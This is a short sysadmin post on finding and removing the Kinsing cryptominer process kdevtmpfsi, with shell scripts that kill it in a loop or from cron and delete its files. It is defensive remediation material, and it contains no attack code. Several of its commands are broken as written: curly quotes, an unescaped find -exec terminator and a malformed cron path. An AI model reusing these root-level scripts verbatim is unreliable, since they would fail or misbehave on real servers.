Knowledge has a beginning but no end

Kinsing malware (kdevtmpfsi) : how to kill

kailas@strategicerp..com

2023-11-03 14:28:39

    Kinsing malware (kdevtmpfsi) :  how to kill

    kdevtmpfsi malware found in postgres Database

    CHALLENGE: kdevtmpfsi is using 100% processor and server memory.

    SOLUTION: Create a bash script to kill the process.

    Kinsing malware is targeting misconfigured Docker containers, especially redis instances (port 6379). The malware is running a linux process in the background: kdevtmpfsi, which is occupying server processor and memory. The main purpose of the virus is to set up a cryptocurrency miner. It seems that container environment attacks have been on the rise recently, with a huge spike in the number of cases in March 2020.

    1. Identify the issue
    Having root access to the server can help to find and delete the malware.
    # Check if the malicious process is running
    htop

    # Find infected files:
    find / -name kdevtmpfsi
    find / -name kinsing

    2. option1) - prepare a bash script that will kill the process every 20 seconds
    – run the bash script in the background

    Bash script
    # /root/scripts/ctKillProc.sh
    #!/bin/sh
    # do what you need to here
    while true; do
    processId=$(ps -ef | grep ‘kdevtmpfsi’ | grep -v ‘grep’ | awk ‘{ printf $2 }’)
    echo $processId
    kill -9 $processId
    echo “[“`date +%Y%m%d%H%M`”] kdevtmpfsi killed.”
    sleep 20
    done
    exit 1

    Run the script in the background
    nohup sh  /root/scripts/ctKillProc.sh &

     

    2. option2) ## Create a script to kill and remove kdevtmpfsi

    Create a new bash script file:

    nano kill.sh
    and add the following code to it.

    #!/bin/bash
    kill $(pgrep kdevtmp)
    kill $(pgrep kinsing)
    find / -iname kdevtmpfsi -exec rm -fv {} ;
    find / -iname kinsing -exec rm -fv {} ;
    rm /tmp/kdevtmp*
    rm /tmp/kinsing*
    Make the script executable.

    chmod +x kill.sh
    Add a cron job to run the script every minute.

    sudo crontab -e
    Be sure that you give the correct path for your script.

    * * * * * /usr/bin/scripts/sh kill.sh
    To verify the cron job with the following command. : # systemctl status cron

    3. remove the crontab line from the affected user
    4. remove all unnecessary opened ports in firewall
    5. disable shell access to the user(from CWP)
    6. update all services/projects to the latest possible versions available in your package manager
     

    Related Articles